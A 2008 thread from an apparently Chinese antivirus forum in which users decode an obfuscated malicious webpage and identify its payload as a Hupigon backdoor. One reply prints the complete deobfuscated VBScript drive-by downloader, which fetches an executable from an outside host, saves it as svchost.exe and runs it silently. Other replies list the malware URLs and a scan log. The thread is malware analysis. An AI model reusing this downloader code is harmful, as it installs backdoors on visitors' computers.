楼主: dearhaoji
收起左侧

[已鉴定] 怎样解这个网页?

 关闭 [复制链接]
dearhaoji
 楼主| 发表于 2008-11-30 12:53:01 | 显示全部楼层
能不能详细一点呀。。。  
<
do
%
2Eone
n
C
D%22
%2
0A%20%20%20%2
D%0
20
0
%20%
%
3D%2
0x%
t%2Eex
bje

29
0
2Fbod
//
<
这个怎么解密呀。。
花间酒
发表于 2008-11-30 12:57:11 | 显示全部楼层
原帖由 dearhaoji 于 2008-11-30 12:53 发表
能不能详细一点呀。。。  
<
do
%
2Eone
n
C
D%22
%2
0A%20%20%20%2
D%0
20
0
%20%
%
3D%2
0x%
t%2Eex
bje

29
0
2Fbod
//
<
这个怎么解密呀。。


纯猜。

http://88ttorg.one.2008isp.com.cn/2.htm
http://88ttorg.one.2008isp.com.cn/3.htm
http://88ttorg.one.2008isp.com.cn/4.htm
shmily512099
发表于 2008-11-30 12:58:06 | 显示全部楼层
原帖由 tanlimo 于 2008-11-30 12:45 发表
去空格,在freshow中一个decode就出来了

http://88ttorg.one.2008isp.com.cn/1.exe



确实如这位兄台所说,刚才我也没仔细看这些加密的东西,细细看了下   发现  http%3A%2F%2F88ttorg%2Eone%2E2008is p%2Ecom%2Ecn%2F1%2Eexe   直接在freshow里一个ESC    就搞定!


学习了 谢谢!
VISN
发表于 2008-11-30 13:14:14 | 显示全部楼层
BDS/Hupigon
雨宫优子
发表于 2008-11-30 14:18:18 | 显示全部楼层
我发火了

直接浏览器解密!!

输入地址:http://88ttorg.one.2008isp.com.cn/1.htm

等待打开完成后

在地址栏输入:javascript: greysign=document.documentElement.outerHTML;document.write("<body></body>");document.body.innerText=greysign;

便可得到代码:
  1. <SCRIPT language=VBScript>
  2.     on error resume next
  3.     dl = "http://88ttorg.one.2008isp.com.cn/1.exe"
  4.     Set df = document.createElement("object")
  5.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  6.     b4="Mi"
  7.     b5="cr"
  8.     b6="o"
  9.     b7="soft"
  10.     b8=".X"
  11.     b9="M"
  12.     b10="L"
  13.     b11="H"
  14.     b12="T"
  15.     b13="T"
  16.     b14="P"
  17.     strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
  18.     Set x = df.CreateObject(strb,"")
  19.     a4="A"
  20.     a5="d"
  21.     a6="o"
  22.     a7="d"
  23.     a8="b"
  24.     a9="."
  25.     a10="S"
  26.     a11="t"
  27.     a12="r"
  28.     a13="e"
  29.     a14="a"
  30.     a15="m"
  31.     stra=a4&a5&a6&a7&a8&a9&a10&a11&a12&a13&a14&a15
  32.     set S = df.createobject(stra,"")
  33.     S.type = 1
  34.     c4="G"
  35.     c5="E"
  36.     c6="T"
  37.     strc=c4&c5&c6
  38.     x.Open strc, dl, False
  39.     x.Send
  40.     fname1="svchost.exe"
  41.     set F = df.createobject("Scripting.FileSystemObject","")
  42.     set tmp = F.GetSpecialFolder(2)
  43.     S.open
  44.     fname1= F.BuildPath(tmp,fname1)
  45.     S.write x.responseBody
  46.     S.savetofile fname1,2
  47.     S.close
  48.     set Q = df.createobject("Shell.Application","")
  49.     Q.ShellExecute fname1,"","","open",0
  50.     </SCRIPT>
复制代码


注:本方法非常危险,建议有沙盘人士使用

[ 本帖最后由 aarwwefdds 于 2008-11-30 14:20 编辑 ]
qianwenxiang
发表于 2008-11-30 16:17:41 | 显示全部楼层
NULLCHAR搞鬼 清掉所有00就行
1.png
失翼天使
发表于 2008-11-30 17:14:54 | 显示全部楼层
http://88ttorg.one.2008isp.com.cn/1.exe        可能是 Win32/Hupigon 特洛伊木马 的变种        连接中断 - 已隔离
qigang
发表于 2008-11-30 18:38:00 | 显示全部楼层
该地址已经是昨日的啦。
wsmj888
发表于 2008-12-1 08:30:17 | 显示全部楼层
进去没有太大反应!
zengmingwh
发表于 2008-12-1 14:30:31 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\1.exe'
C:\1.exe
    [0] Archive type: RAR SFX (self extracting)
    --> 1.exe
      [DETECTION] Contains a recognition pattern of the (harmful) BDS/Hupigon.Gen back-door program
    --> 2.exe
      [DETECTION] Contains recognition pattern of the DR/Delphi.Gen dropper
    [NOTE]      The file was deleted!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 06:46 , Processed in 0.111618 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表